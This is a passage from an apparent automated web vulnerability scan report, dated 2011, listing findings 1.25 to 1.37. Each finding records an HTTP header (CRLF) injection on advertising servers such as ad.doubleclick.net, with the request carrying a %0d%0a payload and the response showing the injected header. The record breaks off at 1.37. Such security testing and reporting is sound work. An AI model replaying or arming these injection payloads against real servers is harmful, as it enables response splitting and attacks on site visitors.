Date: Mon, 14 Feb 2011 01:40:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B3792881.193

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d0ee%0d%0a9315563214f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d0ee%0d%0a9315563214f/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=60387657634239681&mt_id=102306&mt_adid=53&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60387657634239681? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d0ee
9315563214f
/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http: //pixel.mathtag.com/click/img
Date: Mon, 14 Feb 2011 02:14:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6046.134363.2043285697521/B5118749.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69142%0d%0a1bb7359b8ec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69142%0d%0a1bb7359b8ec/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http://r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606%5E947584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64?trg=;ord=5635760168? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69142
1bb7359b8ec
/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http: //r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606^947584^1183^0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64
Date: Mon, 14 Feb 2011 01:52:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6092.AOL/B5108587.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9b799%0d%0abb53a367fe4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9b799%0d%0abb53a367fe4/N6092.AOL/B5108587.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505%5E969227%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64?trg=;ord=4637776738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9b799
bb53a367fe4
/N6092.AOL/B5108587.3;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505^969227^1183^0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64
Date: Mon, 14 Feb 2011 01:41:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e2dd%0d%0aaa7cb3ecbf6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e2dd%0d%0aaa7cb3ecbf6/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ag1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;cmw=owl;sz=300x250;net=cm;ord1=789918;contx=polit;an=300;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.health_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ag1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=$cacheBuster$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e2dd
aa7cb3ecbf6
/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af:
Date: Mon, 14 Feb 2011 02:10:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/drudgereport.ilm/remnant

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 697e6%0d%0a706ed09c5de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /697e6%0d%0a706ed09c5de/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff901.js&size_id=15&account_id=6005&site_id=12414&size=300x250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/697e6
706ed09c5de
/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord=:
Date: Mon, 14 Feb 2011 01:52:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pmv.inm.ind/news_home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93ccd%0d%0a389a982e7d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93ccd%0d%0a389a982e7d5/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http%3A//adserver.adtech.de/adlink%7C979%7C2440402%7C0%7C529%7CAdId%3D2789559%3BBnId%3D3%3Bitime%3D647360380%3Bkey%3Dworafr%3Blink%3D;ord=647360380? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93ccd
389a982e7d5
/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http: //adserver.adtech.de/adlink|979|2440402|0|529|AdId=2789559;BnId=3;itime=647360380;key=worafr;link=;ord=647360380
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/resn.173878/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1c8c4%0d%0a0177437432c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1c8c4%0d%0a0177437432c/resn.173878/;alias=epcv0111a;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D893172%3Bx%3D2333%3Bg%3D172%3Bc%3D794000529%2C794000529%3Bi%3D0%3Bn%3D794%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D5%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.7725227591581643%3Bk%3D;ord=0.7283410648815334? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1c8c4
0177437432c
/resn.173878/;alias=epcv0111a;sz=300x250;click=http: //yads.zedo.com/ads2/c
Date: Mon, 14 Feb 2011 01:37:18 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60afd%0d%0a8f5fec5b5f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60afd%0d%0a8f5fec5b5f5/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60afd
8f5fec5b5f5
/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264:
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c397%0d%0a667e0f07fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c397%0d%0a667e0f07fb/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c397
667e0f07fb
/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=40727:
Date: Mon, 14 Feb 2011 01:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53d32%0d%0a19fe23f2faf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53d32%0d%0a19fe23f2faf/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53d32
19fe23f2faf
/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=40727614:
Date: Mon, 14 Feb 2011 01:38:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 51fdf%0d%0aa355c11c9ff was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=51fdf%0d%0aa355c11c9ff HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:53 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-9zquM-0; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=51fdf
a355c11c9ff

Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

1.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e6b37%0d%0aa14210b269c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=19855/e6b37%0d%0aa14210b269c4186 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-AzquM-0; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=19855/e6b37
a14210b269c
4186
Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

1.37. http://bidder.mathtag.com/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

